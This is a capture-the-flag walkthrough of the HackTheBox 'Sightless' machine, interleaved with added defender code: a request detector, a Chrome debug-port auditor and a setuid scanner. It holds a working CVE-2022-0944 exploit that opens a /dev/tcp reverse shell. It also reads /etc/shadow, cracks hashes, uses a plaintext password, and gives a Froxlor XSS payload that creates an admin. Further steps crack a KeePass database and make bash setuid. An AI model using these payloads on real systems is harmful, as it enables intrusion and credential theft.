HackTheBox Sightless Writeup
Explore the fundamentals of cybersecurity with the Sightless Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts file and add the following entry:

10.10.11.32 sightless.htb sqlpad.sightless.htb

This ensures that your system can resolve the domain names sightless.htb and sqlpad.sightless.htb to the correct IP address 10.10.11.32.
Script to add hosts automatically:

ip="10.10.11.32"
domain="sightless.htb sqlpad.sightless.htb admin.sightless.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV sightless.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-14 04:47 CEST
Nmap scan report for sightless.htb (10.10.11.32)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/14%Time=66E4F941%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20Ser
SF:ver\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20b
SF:eing\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2022-0944
Time to prepare our listener to catch a reverse shell:

nc -lvnp 9001

The sqlpad service will be targeted using a known vulnerability (CVE-2022-0944). Below is a Python script to automate the exploitation process:
#!/usr/bin/env python3
import os
import requests

root_url = "http://sqlpad.sightless.htb"
# Pick the VPN (tun0) address so the reverse shell knows where to call back.
attacker_ip = os.popen("ip a | grep -A 2 'tun0:' | grep -oP '(?<=inet\\s)\\d+(\\.\\d+){3}'").read().strip()
attacker_port = "9001"
target_url = f"{root_url}/api/test-connection"
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
headers = {
    'Content-Type': 'application/json',
    'Accept': 'application/json'
}
data = {
    "name": "test",
    "driver": "mysql",
    "data": {
        "database": payload
    },
    "database": payload
}

def main():
    try:
        response = requests.post(target_url, headers=headers, json=data)
        print(f"Response status code: {response.status_code}")
        print(f"Response body: {response.text}")
        if response.status_code == 200:
            print(f"Exploit sent successfully. Check your listener on {attacker_ip}:{attacker_port}")
        else:
            print(f"Exploit sent, but server responded with status code: {response.status_code}. Check your listener.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()
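From the defender's side, the thing to catch is a template expression arriving in a connection field of the SQLPad API, as the payload above does. The following detector is an added example, not part of the original writeup or of SQLPad: it walks the JSON body of each request and flags any {{ ... }} expression, escalating to "rce" when the expression reaches Node internals. The request records are constructed samples.

```python
import json
import re

# Any {{ ... }} expression in a connection field is suspicious for SQLPad; the
# CVE-2022-0944 payload above reaches Node internals through identifiers like these.
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)
DANGEROUS_RE = re.compile(r"process\.|require\(|child_process|constructor|global\.")

def iter_strings(node):
    """Yield every string value in a parsed JSON document, at any depth."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from iter_strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_strings(value)

def classify_request(method, path, body):
    """Return 'rce' if a template expression touches Node internals, 'template' for
    any other {{ }} expression, or None for a benign (or non-API) request."""
    if method != "POST" or not path.startswith("/api/"):
        return None
    try:
        doc = json.loads(body) if body else {}
    except json.JSONDecodeError:
        return None
    verdict = None
    for value in iter_strings(doc):
        for expr in TEMPLATE_RE.findall(value):
            if DANGEROUS_RE.search(expr):
                return "rce"
            verdict = "template"
    return verdict

# Constructed sample records (method, path, JSON body), not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/api/test-connection", '{"name":"prod","driver":"mysql","data":{"database":"appdb"}}'),
    ("POST", "/api/test-connection", '{"name":"probe","driver":"mysql","data":{"database":"{{ 7*7 }}"}}'),
    ("POST", "/api/test-connection",
     '{"name":"test","driver":"mysql","data":{"database":"{{ process.mainModule.require(\'child_process\').exec(\'CMD\') }}"}}'),
    ("GET", "/api/connections", ""),
]

def scan(records):
    """Classify each record; the verdict is what an alert rule would key on."""
    return [(path, classify_request(method, path, body)) for method, path, body in records]
```

On the sample set, scan(SAMPLE_REQUESTS) yields None, "template", "rce" and None in that order.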
Docker Environment
Run the following command to confirm you are inside a Docker container:

ls / -la

If /docker-entrypoint exists, or /proc/1/cgroup suggests a Docker environment, proceed to the next step.
Get Michael’s Hash

cat /etc/shadow

Extract the hash for the user michael.
Brute Force the Hash

read -rp "Password Hash? --> " hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1800 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 1800 /tmp/hash.txt --show
rm -f /tmp/hash.txt
SSH into the Target
Use the cracked password to SSH into michael's account and read the user flag:

ssh michael@sightless.htb

cat user.txt
Froxlor Intended: CVE-2024-34070
Port forwarding:

sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f

Then open http://admin.sightless.htb:8081/ in your browser.
Payload:
admin{{$emit.constructor`function+b(){+var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3b+var+csrfToken%3dmetaTag.getAttribute('content')%3b+var+xhr%3dnew+XMLHttpRequest()%3b+var+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3b+var+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3b+xhr.open("POST",url,true)%3b+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3b+xhr.send(params)}%3ba%3db()`()+}}
Intercept the Froxlor login with Burp.
Replace the loginname parameter with the payload above.
Log in with abcd:Abcd@@1234.
You will see the web1 FTP account in the link.
Set the password for web1.
Log out and log in as web1.
Now set the FTP password via the link.
Crack the KeePass Database
- Connect to the FTP server:
  lftp sightless.htb
- Log in with username web1 and the password you set earlier:
  login web1 <password>
- Disable certificate verification to avoid errors:
  set ssl:verify-certificate no
- List the available files:
  ls
  You will see output similar to:
  drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess
  -rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
- Navigate to the goaccess directory and its backup subdirectory:
  cd goaccess/backup/
  ls
  Inside backup, you'll find the KeePass database file (Database.kdb):
  -rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
- Download the KeePass database:
  get Database.kdb
- Analyze the KeePass database. Use a tool like kpcli to attempt to open it:
  kpcli --kdb Database.kdb
  You will need the master password to proceed.
- Crack the KeePass password. Extract the hash from the database and save it as Database.kdb.hash, then use hashcat with a dictionary file (e.g., rockyou.txt) to crack it:
  keepass2john Database.kdb | tee Database.kdb.hash
  hashcat Database.kdb.hash /usr/share/dict/rockyou.txt --user -m 13400
  If successful, hashcat will display the master password.
- Access and extract data. Open the KeePass database using the cracked password, navigate to the relevant section and save the attached SSH key:
  kpcli --kdb Database.kdb
  ls General/sightless.htb/Backup/
  show -f General/sightless.htb/Backup/ssh
  attach General/sightless.htb/Backup/ssh
- Connect to the target system. Use the extracted SSH private key to log in as root:
  dos2unix ~/id_rsa
  echo "" >> ~/id_rsa
  chmod 600 ~/id_rsa
  ssh -i ~/id_rsa root@sightless.htb
  To check for CRLF line endings, use exiftool for metadata or simply open the file in a text editor, where the line endings (LF/CRLF) are usually displayed in the UI.
- Capture the flag. Read the root.txt file to complete the challenge:
  cat root.txt
Froxlor Unintended: Chrome Debugging
This is possible because the --remote-debugging-port=0 flag is enabled in Chrome, allowing remote debugging. Port 0 means Chrome picks an ephemeral port at start-up, which is why the listening port has to be discovered below.

Log in as michael:

sshpass -p insaneclownposse ssh michael@sightless.htb
To determine the correct ports, use the following commands to check for active processes and listening ports:

ps auxww | grep chrome
ss -tulpn

Alternatively, you can use tools like pspy to monitor or confirm activity.
Forward ports using SSH to access internal web services from your PC:

sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
sshpass -p insaneclownposse ssh michael@sightless.htb -L 44163:localhost:44163 -N -f

Note that port 44163 may vary, so check for the correct port using the earlier steps.
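To audit a host for this exposure from the defender's side, here is an added example (not part of the original writeup) that parses the ps auxww and ss -tulpn output from the steps above and joins Chrome processes started with --remote-debugging-port to the sockets they actually listen on. The PS_SAMPLE and SS_SAMPLE outputs are constructed, not captured from the target.

```python
import re

# Constructed sample output (not captured from the target) of the two commands above.
PS_SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
john 1207 0.0 0.1 123456 7890 ? S 10:01 0:00 /usr/bin/chrome --headless --remote-debugging-port=0 --user-data-dir=/tmp/chrome
john 1310 0.0 0.0 98765 4321 ? S 10:01 0:00 /usr/bin/chrome --type=renderer
root 1 0.0 0.0 100000 1000 ? Ss 09:59 0:01 /sbin/init
"""
SS_SAMPLE = """\
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp LISTEN 0 4096 127.0.0.1:44163 0.0.0.0:* users:(("chrome",pid=1207,fd=22))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=900,fd=3))
tcp LISTEN 0 511 127.0.0.1:8080 0.0.0.0:* users:(("apache2",pid=1100,fd=4))
"""
DEBUG_FLAG = re.compile(r"--remote-debugging-port=(\d+)")
SS_LISTEN = re.compile(r'LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')

def debug_processes(ps_output):
    """Map PID -> port requested via --remote-debugging-port (0 = Chrome picks one)."""
    found = {}
    for line in ps_output.splitlines()[1:]:
        fields = line.split(None, 10)  # COMMAND is the 11th column and keeps its spaces
        if len(fields) < 11:
            continue
        match = DEBUG_FLAG.search(fields[10])
        if match:
            found[int(fields[1])] = int(match.group(1))
    return found

def listening_ports(ss_output):
    """Map PID -> [(bind address, port), ...] for every LISTEN line of `ss -tulpn`."""
    ports = {}
    for line in ss_output.splitlines():
        match = SS_LISTEN.search(line)
        if match:
            addr, port, _name, pid = match.groups()
            ports.setdefault(int(pid), []).append((addr, int(port)))
    return ports

def audit(ps_output, ss_output):
    """One finding per Chrome process with the flag, joined to its actual listeners."""
    ports = listening_ports(ss_output)
    return [{"pid": pid, "requested": req, "listeners": ports.get(pid, [])}
            for pid, req in debug_processes(ps_output).items()]

if __name__ == "__main__":
    for finding in audit(PS_SAMPLE, SS_SAMPLE):
        print(finding)
```

A listener bound to 127.0.0.1 is still reachable by any local user (and, as this section shows, over an SSH port forward), so the finding is worth acting on even without a 0.0.0.0 bind.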
Now, on your PC, open Chromium, which will act as the remote debugging client:

chromium

Next, navigate to the Chromium inspect devices page:
- Open Chromium and go to chrome://inspect/#devices.
- Add localhost:44163 as a target and click inspect on the remote web service.
- Inspect the website by pressing F12 to open Developer Tools, then go to the Network tab.
- Make sure Preserve log is enabled for easier access to network activity.
You will find a POST request in the Froxlor service with the payload containing the username and password in the network logs.
For more details, refer to this resource: Chrome Remote Debugger Pentesting.
Web Exploitation
- Inspect the website for a POST request to /index.php to capture the username and password.
- Log in and add a PHP version at:
  http://admin.sightless.htb:8081/admin_phpsettings.php?page=fpmdaemons&action=add
- In the restart command, put:
  chmod 4755 /bin/bash
- Restart the PHP-FPM service to trigger the command:
  http://admin.sightless.htb:8081/admin_settings.php?page=overview&part=phpfpm
- SSH back in as michael and use the now setuid bash to read the flag:
  ssh michael@sightless.htb
  /bin/bash -p
  cat /tmp/root.txt
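A defender's counterpart to this step, added here and not from the original writeup: a scanner that reports setuid-root files, flagging shells and interpreters such as /bin/bash outright and anything else not on a small allowlist of binaries Ubuntu ships setuid. The allowlist and the default search roots are assumptions to tune per host.

```python
import os
import stat

# Setuid-root binaries that ship on a stock Ubuntu system (assumed, partial allowlist).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/fusermount3", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
}
# Interpreters that hand out a root shell when setuid (bash -p keeps the effective uid).
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "python3", "perl"}

def classify(path, mode, uid, expected=EXPECTED_SUID):
    """Pure decision logic: 'shell' for a setuid-root shell or interpreter,
    'unexpected' for any other setuid-root file not on the allowlist, else None."""
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return None
    if os.path.basename(path) in SHELLS:
        return "shell"
    return None if os.path.normpath(path) in expected else "unexpected"

def scan_suid(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/local", "/opt")):
    """Walk the given directories and return [(path, verdict)] for every finding.
    Paths are deduplicated by realpath so merged-usr symlinks (/bin -> /usr/bin) count once."""
    findings = []
    seen = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                real = os.path.realpath(path)
                if real in seen:
                    continue
                seen.add(real)
                verdict = classify(path, st.st_mode, st.st_uid)
                if verdict:
                    findings.append((path, verdict))
    return findings

if __name__ == "__main__":
    for path, verdict in scan_suid():
        print(f"{verdict:10} {path}")
```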